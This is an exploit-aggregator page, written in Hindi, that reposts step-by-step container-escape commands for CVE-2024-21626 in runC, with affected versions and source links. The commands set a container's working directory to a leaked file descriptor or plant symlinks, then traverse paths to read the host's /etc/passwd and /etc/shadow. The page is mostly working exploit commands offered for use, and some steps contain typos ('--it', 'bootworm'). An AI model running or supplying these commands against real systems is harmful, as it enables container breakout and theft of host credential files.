Sploitus

Exploit for CVE-2024-21626

kitploit · 2026-08-25

Exploit Code

MARKDOWN36 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-FLOJBOJ-CVE-2024-21626
# CVE-2024-21626

## शोषण (कार्यशील निर्देशिका)

`docker run -w /proc/self/fd/8 --name cve-2024-21626 --rm -it debian:bookworm`

  * महत्वपूर्ण है कि `-w /proc/self/fd/8` रखें\
  * होस्ट फ़ाइलसिस्टम तक पहुँचने के लिए कंटेनर के अंदर `cat ../../../../../../../../../etc/passwd` कमांड का उपयोग करें



## शोषण (सिमलिंक)

  1. `docker run --name cve-2024-21626 --rm --it debian:bootworm`
  2. कंटेनर के अंदर - `ln -sf /proc/self/fd/7/ /foo`
  3. कंटेनर के अंदर - `ln -sf /proc/self/fd/8/ /bar`
  4. `docker exec -it -w /bar cve-2024-21626 sleep 120`
  5. कंटेनर के अंदर - `ls -F /proc`
  6. कंटेनर के अंदर - `cat /proc/9/cmdline` (`sleep` कमांड का PID खोजें)
  7. कंटेनर के अंदर - `cat /proc/9/cwd/../../../../../etc/shadow`



## संवेदनशील संस्करण

  * runC: >= 1.0.0-rc93 और <= 1.1.11.
  * containerd: >= 1.4.7 और <= 1.6.27, और >= 1.7.0 और <= 1.7.12.
  * Docker: 25.0.2 में ठीक किया गया



## स्रोत

  * https://nitroc.org/en/posts/cve-2024-21626-illustrated/#exploit-via-setting-working-directory-to-procselffdfd
  * https://labs.withsecure.com/publications/runc-working-directory-breakout--cve-2024-21626